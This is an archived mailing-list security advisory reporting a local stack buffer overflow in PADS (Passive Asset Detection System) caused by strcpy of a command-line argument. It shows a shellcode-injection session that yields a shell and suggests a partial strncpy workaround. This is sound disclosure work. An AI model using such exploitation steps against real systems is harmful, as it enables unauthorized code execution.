lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <412537A8.3070509@cr-secure.net>
From: chris at cr-secure.net (ChrisR-)
Subject: PADS Simple Stack Overflow

Pads Stack Overflow Advisory

---[ Vulnerable Application ]---

Pads - Passive Asset Detection System
(from the README ^)
http://passive.sourceforge.net/

Vulnerable to a stack overflow.

---[ Vulnerable Code ]---

 From pads.c

<code snip>

......

char report_file[255] = "assets.csv";

.........

case 'w':
       strcpy(report_file, optarg);
       break;
............

</code snip>

Very simple stack overflow. Can be exploited locally with 
www.cr-secure.net/ex_bof.c (a lazy mans local exploit).

_______________________________________________-
/> ex_bof
Please enter the values as requested . . .
Enter the vulnerable program path: pads
Enter the vulnerable program name: pads
Enter any arguments the program requires: -w
Enter an offset: 0
Enter a buffer size: 600
Enter the nop sled size: 400

The Return Value Is: 0xbffff8b8
Injecting Shellcode . . .

pads - Passive Asset Detection System
v1.1 - 08/14/04
Matt Shelton <matt@...tshelton.com>

sh-3.00$ id
uid=1000(chris) gid=1000(chris) 
groups=20(dialout),24(cdrom),25(floppy),1000(chris)
sh-3.00$
________________________________________________

This is typically only a big deal if 'pads' is uid=0. Which it is not by 
default when compiled from source,
which is how I built it. Very low danger here.

---[ Temporary work around ]---

Well for now you could change strcpy() to

.......
strncpy(report_file, optarg, 255);        // still not very secure, its 
a 'workaround'
.......

Matt Shelton (author) was notified of this, a new version 1.1.1 is now 
available. Pads is still a beta
application but shows a lot of promise. Check it out. The link is at the 
top of this advisory.

---[ Hello ]---

Mattjf && tlharris && Think && others

www.cr-secure.net
chris@...secure.net
ChrisR-


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ